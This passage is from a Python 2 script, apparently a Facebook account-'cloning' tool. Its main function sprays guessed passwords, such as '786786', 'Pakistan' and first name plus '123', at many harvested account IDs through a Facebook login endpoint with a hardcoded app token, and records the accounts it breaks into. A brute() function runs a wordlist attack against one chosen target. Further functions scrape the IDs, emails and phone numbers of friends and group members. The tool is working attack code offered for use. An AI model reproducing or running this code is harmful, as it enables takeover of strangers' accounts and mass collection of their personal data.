	jalan(' \033[1;97mPlz Wait Cloned Accounts Will Appear Here')
        jalan(' \033[1;97m         Start Cloning Pakistani ids ')
	print "\033[1;97m----------------------------------------"
	
			
	def main(arg):
		global cekpoint,oks
		user = arg
		try:
			os.mkdir('cookie')
		except OSError:
			pass #Dev:qaiser
		try:
			k = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
			y = json.loads(k.text)
			pass1 = ('786786')
			data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
			s = json.load(data)
			if 'access_token' in s:
				print '\x1b[1;97mLive\x1b[1;97m \x1b[1;97m\x1b[1;97m ' + user + ' \x1b[1;97m\x1b[1;97m ' + pass1
				oks.append(user+pass1)
			else:
				if 'www.facebook.com' in s["error_msg"]:
					print '\x1b[1;97mError\x1b[1;97m \x1b[1;97m\x1b[1;97m ' + user + ' \x1b[1;97m\x1b[1;97m ' + pass1
					cek = open("out/checkpoint.txt", "k")
					cek.write(user+"|"+pass1+"\n")
					cek.close()
					cekpoint.append(user+pass1)
				else:
					pass2 = 'Pakistan'
					data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
					s = json.load(data)
					if 'access_token' in s:
						print '\x1b[1;97mLive\x1b[1;97m \x1b[1;97m\x1b[1;97m ' + user + ' \x1b[1;97m\x1b[1;97m ' + pass2
						oks.append(user+pass2)
					else:
						if 'www.facebook.com' in s["error_msg"]:
							print '\x1b[1;97mError\x1b[1;97m \x1b[1;97m\x1b[1;97m ' + user + ' \\x1b[1;97m\x1b[1;97m ' + pass2
							cek = open("out/checkpoint.txt", "k")
							cek.write(user+"|"+pass2+"\n")
							cek.close()
							cekpoint.append(user+pass2)
						else:
							pass3 = y['first_name'] + '123'
							data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
							s = json.load(data)
							if 'access_token' in s:
								print '\x1b[1;97mLive\x1b[1;97m \x1b[1;97m\x1b[1;97m ' + user + ' \x1b[1;97m\x1b[1;97m ' + pass3
								oks.append(user+pass3)
							else:
								if 'www.facebook.com' in s["error_msg"]:
									print '\x1b[1;97mError\x1b[1;97m \x1b[1;97m\x1b[1;97m ' + user + ' \x1b[1;97m\x1b[1;97m ' + pass3
									cek = open("out/checkpoint.txt", "k")
									cek.write(user+"|"+pass3+"\n")
									cek.close()
									cekpoint.append(user+pass3)
								else:
									pass4 = y['first_name'] + '1234'
									data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
									s = json.load(data)
									if 'access_token' in s:
										print '\x1b[1;97mLive\x1b[1;97m \x1b[1;97m\x1b[1;97m ' + user + ' \x1b[1;97m\x1b[1;97m' + pass4
										oks.append(user+pass4)
									else:
										if 'www.facebook.com' in s["error_msg"]:
											print '\x1b[1;97mError\x1b[1;97m \x1b[1;97m\x1b[1;97m ' + user + ' \x1b[1;97m\x1b[1;97m ' + pass4
											cek = open("out/checkpoint.txt", "k")
											cek.write(user+"|"+pass4+"\n")
											cek.close()
											cekpoint.append(user+pass4)
										else:
											pass5 = y['first_name'] + '12'
											data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
											s = json.load(data)
											if 'access_token' in s:
												print '\x1b[1;97mLive\x1b[1;97m \x1b[1;97m\x1b[1;97m ' + user + ' \x1b[1;97m\x1b[1;97m ' + pass5
												oks.append(user+pass5)
											else:
												if 'www.facebook.com' in s["error_msg"]:
													print '\x1b[1;97mError\x1b[1;97m \x1b[1;97m\x1b[1;97m ' + user + ' \\x1b[1;97m\x1b[1;97m ' + pass5
													cek = open("out/checkpoint.txt", "k")
													cek.write(user+"|"+pass5+"\n")
													cek.close()
													cekpoint.append(user+pass5)
												else:
													pass6 = y['first_name'] + '786'
													data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
													s = json.load(data)
													if 'access_token' in s:
														print '\x1b[1;97mLive\x1b[1;97m \x1b[1;97m\x1b[1;97m ' + user + ' \x1b[1;97m\x1b[1;97m ' + pass6
														oks.append(user+pass6)
													else:
														if 'www.facebook.com' in s["error_msg"]:
															print '\x1b[1;97mError\x1b[1;97m \x1b[1;97m\x1b[1;97m ' + user + ' \x1b[1;97m\x1b[1;97m ' + pass6
															cek = open("out/checkpoint.txt", "k")
															cek.write(user+"|"+pass6+"\n")
															cek.close()
															cekpoint.append(user+pass6)
														else:
															pass7 = 'Pakistan1'
															data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
															s = json.load(data)
															if 'access_token' in s:
																print '\x1b[1;97mLive\x1b[1;97m \x1b[1;97m\x1b[1;97m ' + user + ' \x1b[1;97m\x1b[1;97m ' + pass7
																oks.append(user+pass7)
															else:
																if 'www.facebook.com' in s["error_msg"]:
																	print '\x1b[1;97mError\x1b[1;97m \x1b[1;97m\x1b[1;97m ' + user + ' \x1b[1;97m\x1b[1;97m ' + pass7
																	cek = open("out/checkpoint.txt", "k")
																	cek.write(user+"|"+pass7+"\n")
																	cek.close()
																	cekpoint.append(user+pass7)
																	
															
		except:
			pass
		
	p = ThreadPool(30)
	p.map(main, id)
	print "▤▤▤▤▤▤▤▤▤▤▤▤▤▤▤▤▤▤▤▤▤▤▤▤▤▤▤▤▤▤▤"
	print "  Written By Qaiser" #Dev:qaiser
	print '\033[1;97mProcess Has Been Completed \033[1;97m....'
        print '\033[1;97mType (python2 Dvl.py) New Fb Start Cloning\033[1;97m....'
	print"\033[1;97mTotal Live/\x1b[1;97mCheckpoint \033[1;97m: \033[1;97m"+str(len(oks))+"\033[1;97m/\033[1;97m"+str(len(cekpoint))
	print """


░░░░░▄▄▀▀▀▀▀▀▀▀▀▄▄░░░░░

░░░░█░░░░░░░░░░░░░█░░░░

░░░█░░░░░░░░░░▄▄▄░░█░░░

░░░█░░▄▄▄░░▄░░███░░█░░░

░░░▄█░▄░░░▀▀▀░░░▄░█▄░░░

░░░█░░▀█@█@█@█@█▀░░█░░░

░░░▄██▄▄▀▀▀▀▀▀▀▄▄██▄░░░

░▄█░█▀▀█▀▀▀█▀▀▀█▀▀█░█▄░


LOGIN ERROR ID AFTER 2 WEEKS (14DAYS)

"""
	
	raw_input("\n\033[1;97m[\033[1;97mBack\033[1;97m]")
	crack()
	
def brute():
    os.system('clear')
    try:
        toket = open('login.txt', 'r').read()
    except IOError:
        print '\x1b[1;91m[!] Token not found'
        os.system('rm -rf login.txt')
        time.sleep(0.001)
        login()
    else:
        os.system('clear')
        print logo14
        print '-----------------------------------------------------------'
        try:
            email = raw_input('\x1b[1;97mID\x1b[1;97m/\x1b[1;97mEmail \x1b[1;97mTarget \x1b[1;97m:\x1b[1;97m ')
            passw = raw_input('\x1b[1;97mWordlist \x1b[1;97m(Type--> dvl.list) \x1b[1;97m: \x1b[1;97m')
            total = open(passw, 'r')
            total = total.readlines()
            print '------------------------------------------------------------'
            print '\x1b[1;97m[\x1b[1;97m\xe2\x9c\x93\x1b[1;97m] \x1b[1;97mTarget \x1b[1;97m:\x1b[1;97m ' + email
            time.sleep(0.05)
            print '\x1b[1;97mTotal\x1b[1;94m ' + str(len(total)) + ' \x1b[1;97mPassword'
            time.sleep(0.05)
            jalan('\x1b[1;97m[\xe2\x9c\xba] \x1b[1;97mPlease wait \x1b[1;97m...')
            sandi = open(passw, 'r')
            for pw in sandi:
                try:
                    pw = pw.replace('\n', '')
                    sys.stdout.write('\r\x1b[1;97m[\x1b[1;97m\xe2\x9c\xb8\x1b[1;97m] \x1b[1;97mTry \x1b[1;97m' + pw)
                    sys.stdout.flush()
                    data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
                    mpsh = json.loads(data.text)
                    if 'access_token' in mpsh:
                        dapat = open('Brute.txt', 'w')
                        dapat.write(email + ' ● ' + pw + '\n')
                        dapat.close()
                        print '\x1b[1;92mFounded.'
                        print 52 * '\x1b[1;97m\xe2\x95\x90'
                        print '\x1b[1;97m[\xe2\x9e\xb9] \x1b[1;97mUsername \x1b[1;97m:\x1b[1;97m ' + email
                        print '\x1b[1;97m[\xe2\x9e\xb9] \x1b[1;97mPassword \x1b[1;97m:\x1b[1;97m ' + pw
                        keluar()
                    else:
                        if 'www.facebook.com' in mpsh['error_msg']:
                            ceks = open('Brutecekpoint.txt', 'w')
                            ceks.write(email + ' | ' + pw + '\n')
                            ceks.close()
                            print '\x1b[1;92mFounded.'
                            print  "--------------------------------------------------"
                            print '\x1b[1;91m[!] \x1b[1;97mAccount Maybe Checkpoint'
                            time.sleep(0.05)
                            print '\x1b[1;97m[\xe2\x9e\xb9] \x1b[1;97mUsername \x1b[1;97m:\x1b[1;97m ' + email
                            time.sleep(0.05)
                            print '\x1b[1;97m[\xe2\x9e\xb9] \x1b[1;97mPassword \x1b[1;97m:\x1b[1;97m ' + pw
                            keluar()
                except requests.exceptions.ConnectionError:
                    print '\x1b[1;91m[!] Connection Error'
                    time.sleep(1)

        except IOError:
            print '\x1b[1;91m[!] File not found...'
            print """\n\x1b[1;91m[!] \x1b[1;93mAdd another wordlist corect """
            super()
            
def tokenz():
	os.system('clear')
	print logo
	toket = raw_input("\033[1;97m[?] \033[1;97mToken\033[1;97m : Enter Acces Token")
	try:
		otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
		a = json.loads(otw.text)
		nama = a['name']
		zedd = open("login.txt", 'w')
		zedd.write(toket)
		zedd.close()
		menu()
	except KeyError:
		print "\033[1;91m[!] Wrong"
		e = raw_input("\033[1;97m[?] \033[1;97mWant to pick up token?\033[1;97m[y/n]: ")
		if e =="":
			keluar()
		elif e =="y":
			login()
		else:
			keluar()

def get(data):
	print '[*] Generate access token '

	try:
		os.mkdir('cookie')
	except OSError:
		pass

	b = open('cookie/token.log','w')
	try:
		r = requests.get('https://api.facebook.com/restserver.php',params=data)
		a = json.loads(r.text)

		b.write(a['access_token'])
		b.close()
		print '[*] successfully generate access token'
		print '[*] Your access token is stored in cookie/token.log'
		menu()
	except KeyError:
		print '[!] Failed to generate access token'
		print '[!] Check your connection / email or password'
		os.remove('cookie/token.log')
		menu()
	except requests.exceptions.ConnectionError:
		print '[!] Failed to generate access token'
		print '[!] Connection error !!!'
		os.remove('cookie/token.log')
		menu()
        
	
def asif():
	global toket
	os.system('clear')
	try:
		toket=open('login.txt','r').read()
	except IOError:
		print"\x1b[1;91mToken invalid"
		os.system('rm -rf login.txt')
		time.sleep(1)
		login()
	os.system('clear')
	print logo24
	print "1 .\x1b[1;97mGet ID From Friends      "
        time.sleep(0.05)
        print "2 .\033[1;97mFriends  IDs    "
        time.sleep(0.05)
        print "3 .\033[1;97mGet  ids From Group        "
        time.sleep(0.05)
        print "4 .\033[1;97mGet Friends Email        "
        time.sleep(0.05)
        print "5 .\033[1;97mFriends  Email   From  Friend lists"
        time.sleep(0.05)
        print "6 .\033[1;97mGet  Phone number  From  Friends"
        time.sleep(0.05)
        print "7 .\033[1;97mFriend's Phone   From  Friends list"
        time.sleep(0.05)
        print "8 .\033[1;97mGet All  Information   Friends"
        time.sleep(0.05)
	print "0 .\033[1;97mBack                          "
	pilih_asif()

def pilih_asif():
	peak = raw_input("\n\033[1;97mEnter  Number \033[1;97m")
	if peak =="":
		print "\x1b[1;91mFill in correctly"
		pilih_asif()
	elif peak =="1":
		id_friends()
        elif peak =="2":
	        idfrom_friends()
        elif peak =="3":
                id_member_grup()
        elif peak =="4":
	        email()
        elif peak =="5":
	        emailfrom_friends()
        elif peak =="6":
	        nomor_hp()
        elif peak =="7":
	        hpfrom_friends()
        elif peak =="8":
                informasi()
	elif peak =="0":
		menu()

def id_friends():
    os.system('clear')
    try:
        toket = open('login.txt', 'r').read()
    except IOError:
        print '\x1b[1;91m[!] Token not found'
        os.system('rm -rf login.txt')

        time.sleep(1)
        login()
    else:
        try:
            os.system('clear')
            print logo11
            print 52 * '\x1b[1;97m\xe2\x95\x90'
            r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
            z = json.loads(r.text)
            save_id = raw_input('\x1b[1;97mSave File \x1b[1;97mext(file.txt) \x1b[1;97m: \x1b[1;97m')
            bz = open(save_id, 'w')
            jalan('\x1b[1;97m[\xe2\x9c\xba] \x1b[1;97mPlease wait \x1b[1;97m...')
            print 52 * '\x1b[1;97m\xe2\x95\x90'
            for ah in z['data']:
                idfriends.append(ah['id'])
                bz.write(ah['id'] + '\n')
                print '\r\x1b[1;97mName\x1b[1;97m  :\x1b[1;97m ' + ah['name']
                print '\x1b[1;97mID   \x1b[1;97m : \x1b[1;97m' + ah['id']
                print 52 * '\x1b[1;97m\xe2\x95\x90'

            print '\x1b[1;97mTotal ID \x1b[1;97m%s' % len(idfriends)
            print '\x1b[1;97mFile Save \x1b[1;97m: \x1b[1;97m' + save_id
            bz.close()
            raw_input('\n\x1b[1;97m[ \x1b[1;97mBack \x1b[1;97m]')
            asif()
        except IOError:
            print '\x1b[1;91m[!] Error while creating file'
            raw_input('\n\x1b[1;97m[ \x1b[1;97mBack \x1b[1;97m]')
            asif()
        except (KeyboardInterrupt, EOFError):
            print '\x1b[1;91m[!] Stopped'
            raw_input('\n\x1b[1;97m[ \x1b[1;97mBack \x1b[1;97m]')
            menu()
        except KeyError:
            os.remove(save_id)
            print '\x1b[1;91m[!] An error occurred'
            raw_input('\n\x1b[1;97m[ \x1b[1;97mBack \x1b[1;91m]')
            asif()
        except requests.exceptions.ConnectionError:
            print '\x1b[1;91m[\xe2\x9c\x96] No connection'
            keluar()


def idfrom_friends():
    os.system('clear')
    try:
        toket = open('login.txt', 'r').read()
    except IOError:
        print '\x1b[1;91m[!] Token not found'
        os.system('rm -rf login.txt')
        time.sleep(1)
        login()
    else:
        try:
            os.system('clear')
            print logo6
            print 52 * '\x1b[1;97m\xe2\x95\x90'
            idt = raw_input('\x1b[1;97mInput ID Friends \x1b[1;97m: \x1b[1;97m')
            try:
                jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
                op = json.loads(jok.text)
                print '\x1b[1;97m[\x1b[1;97m\xe2\x9c\x93\x1b[1;97m] \x1b[1;97mFrom\x1b[1;97m :\x1b[1;97m ' + op['name']
            except KeyError:
                print '\x1b[1;91m[!] Not be friends'
                raw_input('\n\x1b[1;97m[ \x1b[1;97mBack \x1b[1;97m]')
                asif()

            r = requests.get('https://graph.facebook.com/' + idt + '?fields=friends.limit(5000)&access_token=' + toket)
            z = json.loads(r.text)
            save_idt = raw_input('\x1b[1;97mType File \x1b[1;97mext(file.txt) \x1b[1;97m: \x1b[1;97m')
            bz = open(save_idt, 'w')
            jalan('\x1b[1;97m[\xe2\x9c\xba] \x1b[1;97mplease Wait \x1b[1;97m...')
            print 52 * '\x1b[1;97m\xe2\x95\x90'
            for ah in z['friends']['data']:
                idfromfriends.append(ah['id'])
                bz.write(ah['id'] + '\n')
                print '\r\x1b[1;97mName\x1b[1;97m  :\x1b[1;97m ' + ah['name']
                print '\x1b[1;97mID   \x1b[1;97m : \x1b[1;97m' + ah['id']
                print 52 * '\x1b[1;97m\xe2\x95\x90'

            print '\x1b[1;97mTotal ID \x1b[1;97m%s' % len(idfromfriends)
            print '\x1b[1;97mFile Save \x1b[1;97m: \x1b[1;97m' + save_idt
            bz.close()
            raw_input('\n\x1b[1;97m[ \x1b[1;97mBack \x1b[1;97m]')
            menu()
        except IOError:
            print '\x1b[1;91m[!] Error when creating file'
            raw_input('\n\x1b[1;97m[ \x1b[1;97mBack \x1b[1;97m]')
            asif()
        except (KeyboardInterrupt, EOFError):
            print '\x1b[1;91m[!] Stopped'
            raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
            menu()
        except requests.exceptions.ConnectionError:
            print '\x1b[1;97m[\xe2\x9c\x96] No connection'
            keluar()


def id_member_grup():
    os.system('clear')
    try:
        toket = open('login.txt', 'r').read()
    except IOError:
        print '\x1b[1;91m[!] Token not found'
        os.system('rm -rf login.txt')
        time.sleep(1)
        login()
    else:
        try:
            os.system('clear')
            print logo12
            print 52 * '\x1b[1;97m\xe2\x95\x90'
            id = raw_input('\x1b[1;97mID grup \x1b[1;97m:\x1b[1;97m ')
            try:
                r = requests.get('https://graph.facebook.com/group/?id=' + id + '&access_token=' + toket)
                asw = json.loads(r.text)
                print '\x1b[1;97m[\x1b[1;97m\xe2\x9c\x93\x1b[1;97m] \x1b[1;97mName group \x1b[1;97m:\x1b[1;97m ' + asw['name']
            except KeyError:
                print '\x1b[1;91m[!] Group not found'
                raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
                asif()

            simg = raw_input('\x1b[1;97mSave File \x1b[1;97mext(file.txt) \x1b[1;97m: \x1b[1;97m')
            b = open(simg, 'w')
            jalan('\x1b[1;97m[\xe2\x9c\xba] \x1b[1;97mplzz wi8 \x1b[1;97m...')
            print 52 * '\x1b[1;97m\xe2\x95\x90'
            re = requests.get('https://graph.facebook.com/' + id + '/members?fields=name,id&access_token=' + toket)
            s = json.loads(re.text)
            for i in s['data']:
                idmem.append(i['id'])
                b.write(i['id'] + '\n')
                print '\r\x1b[1;97mName\x1b[1;97m  :\x1b[1;97m ' + i['name']
                print '\x1b[1;97mID  \x1b[1;97m  :\x1b[1;97m ' + i['id']
                print 52 * '\x1b[1;97m\xe2\x95\x90'

            print '\x1b[1;97mTotal ID \x1b[1;97m%s' % len(idmem)
            print '\x1b[1;97mFile saved \x1b[1;97m: \x1b[1;97m' + simg
            b.close()
            raw_input('\n\x1b[1;97m[ \x1b[1;97mBack \x1b[1;97m]')
            asif()
        except IOError:
            print '\x1b[1;91m[!] Error when creating file'
            raw_input('\n\x1b[1;97m[ \x1b[1;97mBack \x1b[1;97m]')
            menu()
        except (KeyboardInterrupt, EOFError):
            print '\x1b[1;91m[!] Stopped'
            raw_input('\n\x1b[1;97m[ \x1b[1;97mBack \x1b[1;97m]')
            asif()
        except KeyError:
            os.remove(simg)
            print '\x1b[1;91m[!] Group not found'
            raw_input('\n\x1b[1;97m[ \x1b[1;97mBack \x1b[1;97m]')
            menu()
        except requests.exceptions.ConnectionError:
            print '\x1b[1;91m[\xe2\x9c\x96] No connection'
            keluar()


def email():
    os.system('clear')
    try:
        toket = open('login.txt', 'r').read()
    except IOError:
        print '\x1b[1;91m[!] Token not found'
        os.system('rm -rf login.txt')
        time.sleep(1)
        login()
    else:
        try:
            os.system('clear')
            print logo13
            print 52 * '\x1b[1;97m\xe2\x95\x90'
            mails = raw_input('\x1b[1;97mSave File \x1b[1;97mext(file.txt) \x1b[1;97m: \x1b[1;97m')
            r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
            a = json.loads(r.text)
            mpsh = open(mails, 'w')
            jalan('\x1b[1;97m[\xe2\x9c\xba] \x1b[1;97mPlease wait \x1b[1;97m...')
            print 52 * '\x1b[1;97m\xe2\x95\x90'
            for i in a['data']:
                x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
                z = json.loads(x.text)
                try:
                    em.append(z['email'])
                    mpsh.write(z['email'] + '\n')
                    print '\r\x1b[1;97mName\x1b[1;97m  :\x1b[1;97m ' + z['name']
                    print '\x1b[1;97mEmail\x1b[1;97m : \x1b[1;97m' + z['email']
                    print 52 * '\x1b[1;97m\xe2\x95\x90'
                except KeyError:
                    pass

            print '\x1b[1;97mTotal Email\x1b[1;97m%s' % len(em)
            print '\x1b[1;97mFile saved \x1b[1;97m: \x1b[1;97m' + mails
            mpsh.close()
            raw_input('\n\x1b[1;97m[ \x1b[1;97mBack \x1b[1;97m]')
            asif()
        except IOError:
            print '\x1b[1;91m[!] Error when creating file'
            raw_input('\n\x1b[1;97m[ \x1b[1;97mBack \x1b[1;97m]')
            asif()
        except (KeyboardInterrupt, EOFError):
            print '\x1b[1;91m[!] Stopped'
            raw_input('\n\x1b[1;97m[ \x1b[1;97mBack \x1b[1;97m]')
            asif()
        except KeyError:
            os.remove(mails)
            print '\x1b[1;97m[!] An error occurred'
            raw_input('\n\x1b[1;97m[ \x1b[1;97mBack \x1b[1;97m]')
            asif()
        except requests.exceptions.ConnectionError:
            print '\x1b[1;91m[\xe2\x9c\x96] No connection'
            keluar()


def emailfrom_friends():
    os.system('clear')
    try:
        toket = open('login.txt', 'r').read()
    except IOError:
        print '\x1b[1;91m[!] Token not found'
        os.system('rm -rf login.txt')
        time.sleep(1)
        login()
    else:
        try:
            os.system('clear')
            print logo19
            print 52 * '\x1b[1;97m\xe2\x95\x90'
            idt = raw_input('\x1b[1;97mInput ID Friends \x1b[1;97m: \x1b[1;97m')
            try:
                jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
                op = json.loads(jok.text)
                print '\x1b[1;97m[\x1b[1;97m\xe2\x9c\x93\x1b[1;97m] \x1b[1;97mFrom\x1b[1;97m :\x1b[1;97m ' + op['name']
            except KeyError:
                print '\x1b[1;91m[!] Not be friends'
                raw_input('\n\x1b[1;97m[ \x1b[1;97mBack \x1b[1;97m]')
                asif()

            mails = raw_input('\x1b[1;97mSave File \x1b[1;97mext(file.txt) \x1b[1;97m: \x1b[1;97m')
            r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
            a = json.loads(r.text)
            mpsh = open(mails, 'w')
            jalan('\x1b[1;97m[\xe2\x9c\xba] \x1b[1;97mPlease wait \x1b[1;97m...')
            print 52 * '\x1b[1;97m\xe2\x95\x90'
            for i in a['data']:
                x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
                z = json.loads(x.text)
                try:
                    emfromfriends.append(z['email'])
                    mpsh.write(z['email'] + '\n')
                    print '\r\x1b[1;97mName\x1b[1;97m  :\x1b[1;97m ' + z['name']
                    print '\x1b[1;97mEmail\x1b[1;97m : \x1b[1;97m' + z['email']
                    print 52 * '\x1b[1;97m\xe2\x95\x90'
                except KeyError:
                    pass

            print '\x1b[1;97mTotal Email\x1b[1;97m%s' % len(emfromfriends)
            print '\x1b[1;97mFile saved \x1b[1;97m: \x1b[1;97m' + mails
            mpsh.close()
            raw_input('\n\x1b[1;97m[ \x1b[1;97mBack \x1b[1;97m]')
            asif()
        except IOError:
            print '\x1b[1;91m[!] Error when creating file'
            raw_input('\n\x1b[1;97m[ \x1b[1;97mBack \x1b[1;97m]')
            asif()
        except (KeyboardInterrupt, EOFError):
            print '\x1b[1;91m[!] Stopped'
            raw_input('\n\x1b[1;97m[ \x1b[1;97mBack \x1b[1;97m]')
            asif()
        except requests.exceptions.ConnectionError:
            print '\x1b[1;91m[\xe2\x9c\x96] No connection'
            keluar()


def nomor_hp():
    os.system('clear')
    try:
        toket = open('login.txt', 'r').read()
    except IOError:
        print '\x1b[1;91m[!] Token not found'
        os.system('rm -rf login.txt')
        time.sleep(1)
        login()
    else:
        try:
            os.system('clear')
            print logo14
            print 52 * '\x1b[1;97m\xe2\x95\x90'
            noms = raw_input('\x1b[1;97mSave File \x1b[1;97mext(file.txt) \x1b[1;97m: \x1b[1;97m')
            url = 'https://graph.facebook.com/me/friends?access_token=' + toket
            r = requests.get(url)
            z = json.loads(r.text)
            no = open(noms, 'w')
            jalan('\x1b[1;97m[\xe2\x9c\xba] \x1b[1;97mPlease wait \x1b[1;97m...')
            print 52 * '\x1b[1;97m\xe2\x95\x90'
            for n in z['data']:
                x = requests.get('https://graph.facebook.com/' + n['id'] + '?access_token=' + toket)
                z = json.loads(x.text)
                try:
                    hp.append(z['mobile_phone'])
                    no.write(z['mobile_phone'] + '\n')
                    print '\r\x1b[1;97mName\x1b[1;97m  :\x1b[1;97m ' + z['name']
                    print '\x1b[1;97mPhone\x1b[1;97m : \x1b[1;97m' + z['mobile_phone']
                    print 52 * '\x1b[1;97m\xe2\x95\x90'
                except KeyError:
                    pass

            print '\x1b[1;97mTotal Phone\x1b[1;97m%s' % len(hp)
            print '\x1b[1;97mFile saved \x1b[1;97m: \x1b[1;97m' + noms
            no.close()
            raw_input('\n\x1b[1;97m[ \x1b[1;97mBack \x1b[1;97m]')
            asif()
        except IOError:
            print '\x1b[1;91m[!] Error when creating file'
            raw_input('\n\x1b[1;97m[ \x1b[1;97mBack \x1b[1;97m]')
            asif()
        except (KeyboardInterrupt, EOFError):
            print '\x1b[1;91m[!] Stopped'
            raw_input('\n\x1b[1;97m[ \x1b[1;97mBack \x1b[1;97m]')
            asif()
        except KeyError:
            os.remove(noms)
            print '\x1b[1;91m[!] An error occurred '
            raw_input('\n\x1b[1;97m[ \x1b[1;97mBack \x1b[1;97m]')
            asif()
        except requests.exceptions.ConnectionError:
            print '\x1b[1;91m[\xe2\x9c\x96] No connection'
            keluar()


def hpfrom_friends():
    os.system('clear')
    try:
        toket = open('login.txt', 'r').read()
    except IOError:
        print '\x1b[1;91m[!] Token not found'
        os.system('rm -rf login.txt')
        time.sleep(1)
        login()
    else:
        try:
            os.system('clear')
            print logo18
            print 52 * '\x1b[1;97m\xe2\x95\x90'
            idt = raw_input('\x1b[1;97mInput Friends ID \x1b[1;97m: \x1b[1;97m')
            try:
                jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
                op = json.loads(jok.text)
                print '\x1b[1;97m[\x1b[1;97m\xe2\x9c\x93\x1b[1;97m] \x1b[1;97mFrom\x1b[1;97m :\x1b[1;97m ' + op['name']
            except KeyError:
                print '\x1b[1;91m[!] Not be friends'
                raw_input('\n\x1b[1;97m[ \x1b[1;97mBack \x1b[1;97m]')
                asif()

            noms = raw_input('\x1b[1;97mSave File \x1b[1;97mext(file.txt) \x1b[1;97m: \x1b[1;97m')
            r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
            a = json.loads(r.text)
            no = open(noms, 'w')
            jalan('\x1b[1;97m[\xe2\x9c\xba] \x1b[1;97mPlease wait \x1b[1;97m...')
            print 52 * '\x1b[1;97m\xe2\x95\x90'
            for i in a['data']:
                x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
                z = json.loads(x.text)
                try:
                    hpfromfriends.append(z['mobile_phone'])
                    no.write(z['mobile_phone'] + '\n')
                    print '\r\x1b[1;97mName\x1b[1;97m  :\x1b[1;97m ' + z['name']
                    print '\x1b[1;97mPhone\x1b[1;97m : \x1b[1;97m' + z['mobile_phone']
                    print 52 * '\x1b[1;97m\xe2\x95\x90'
                except KeyError:
                    pass

            print '\x1b[1;97mTotal number\x1b[1;97m%s' % len(hpfromfriends)
            print '\x1b[1;97mFile saved \x1b[1;97m: \x1b[1;97m' + noms
            no.close()
            raw_input('\n\x1b[1;97m[ \x1b[1;97mBack \x1b[1;97m]')
            asif()
        except IOError:
            print '\x1b[1;91m[!] Make file failed'
            raw_input('\n\x1b[1;97m[ \x1b[1;97mBack \x1b[1;97m]')
            asif()
        except (KeyboardInterrupt, EOFError):
            print '\x1b[1;91m[!] Stopped'
            raw_input('\n\x1b[1;97m[ \x1b[1;97mBack \x1b[1;97m]')
            asif()
        except requests.exceptions.ConnectionError:
            print '\x1b[1;91m[\xe2\x9c\x96] No connection'
            keluar()

def informasi():
	os.system('reset')
	try:
		toket=open('login.txt','r').read()
	except IOError:
		print"\033[1;91m[!] Token not found"
		os.system('rm -rf login.txt')
		time.sleep(1)
		login()
	os.system('reset')
	print logo16
	aid = raw_input('\033[1;97mEnter ID\033[1;97m/\033[1;97mName\033[1;97m : \033[1;97m')
	jalan('\033[1;97mWait a minute \033[1;97m...')
	r = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
	cok = json.loads(r.text)
	for i in cok['data']:
		if aid in i['name'] or aid in i['id']:
			x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
			z = json.loads(x.text)
			print 42*"\033[1;97m"
			try:
				print '\033[1;97mName\033[1;97m          : '+z['name']
			except KeyError: print '\033[1;97mName\033[1;97m          : \033[1;91mNot found'
			try:
				print '\033[1;97mID\033[1;97m            : '+z['id']
			except KeyError: print '\033[1;97mID\033[1;97m            : \033[1;91mNot found'
			try:
				print '\033[1;97mEmail\033[1;97m         : '+z['email']
